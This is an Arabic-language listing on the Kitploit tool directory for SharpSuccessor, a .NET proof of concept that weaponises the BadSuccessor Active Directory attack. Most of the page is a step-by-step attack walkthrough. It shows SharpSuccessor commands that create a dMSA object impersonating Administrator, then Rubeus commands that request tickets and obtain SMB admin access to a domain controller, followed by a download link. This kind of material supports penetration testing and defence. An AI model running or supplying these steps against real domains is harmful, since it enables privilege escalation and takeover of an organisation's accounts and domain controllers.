Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SharpSuccessor — SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. | Kitploit
أدوات/GitHubGitHub/logangoins/sharpsuccessor
Privilege EscalationExploitationPost-ExploitationPenetration TestingIdentity & Access Management (IAM)AuthenticationRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.

عرض المستودع
42170منذ 10 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SharpSuccessor

SharpSuccessor هي أداة إثبات مفهوم (POC) مبنية على .NET لتسليح هجوم BadSuccessor الخاص بـ Yuval Gordon (@YuG0rd) من Akamai بالكامل. يمكن لمستخدم منخفض الامتيازات يمتلك صلاحيات CreateChild على أي وحدة تنظيمية (OU) في نطاق Active Directory مع صلاحية كتابة على كائن مستهدف تنفيذ استيلاء على الحساب.

استخدم SharpSuccessor لإضافة كائن dMSA وتجهيزه كسلاح، بالإضافة إلى كتابة السمات المناسبة على الحساب المستهدف الذي ترغب في انتحال شخصيته:

root@kitploit:~
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

اطلب تذكرة TGT بسياق المستخدم الحالي، في هذه الحالة jdoe:

root@kitploit:~
Rubeus.exe tgtdeleg /nowrap

image

ثم استخدم تلك التذكرة tgt لانتحال شخصية حساب dMSA:

root@kitploit:~
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

يمكنك الآن طلب تذكرة خدمة بسياق Administrator لأي SPN، بما في ذلك وحدات تحكم النطاق (Domain Controllers) لمرحلة ما بعد الاستغلال. على سبيل المثال، سأعرض هنا صلاحيات الإدارة لبروتوكول SMB على وحدة تحكم النطاق:

root@kitploit:~
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

الآن بعد أن أصبحت التذكرة في الذاكرة، يمكننا اختبار الوصول:

image

المساعدة والإلهام

جزيل الشكر لـ Jim Sykora و Garrett Foster على الإلهام والمساعدة في بناء هذه الأداة!

تنزيل الأداة